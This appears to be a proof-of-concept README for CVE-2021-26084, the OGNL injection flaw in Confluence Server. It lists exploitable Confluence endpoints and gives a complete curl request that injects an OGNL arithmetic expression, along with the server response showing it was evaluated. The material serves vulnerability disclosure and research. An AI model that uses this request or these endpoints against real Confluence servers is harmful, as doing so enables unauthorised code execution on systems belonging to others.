# CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injection
An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.

My fight to locate the entrypoints and injections XD
Fight (1) | Fight (2)
--- | ---
 | 
Finally confluence Entrypoints Exploited
```
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action
```
My first manual inspection: Note: Pre-Authenticated user
```
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'
Server Response:
HTTP/1.1 200
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>
[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />
```
# References:
https://jira.atlassian.com/browse/CONFSERVER-67940 <br/>
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html <br/>
Amazing writeup posted here: <br/>
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
Some hints very useful by: <br/>
<em><a href="https://twitter.com/wvuuuuuuuuuuuuu" rel="nofollow">@wvuuuuuuuuuuuuu</a></em><br/>
<em><a href="https://twitter.com/iamnoooob" rel="nofollow">@iamnoooob</a></em><br/>
# Author
Alex Hernandez aka <em><a href="https://twitter.com/_alt3kx_" rel="nofollow">(@\_alt3kx\_)</a></em>
[4.0K] /data/pocs/1697ea35ef508d0f0da1159c6f857e86158c7d7e
├── [ 34K] LICENSE
└── [2.3K] README.md
0 directories, 2 files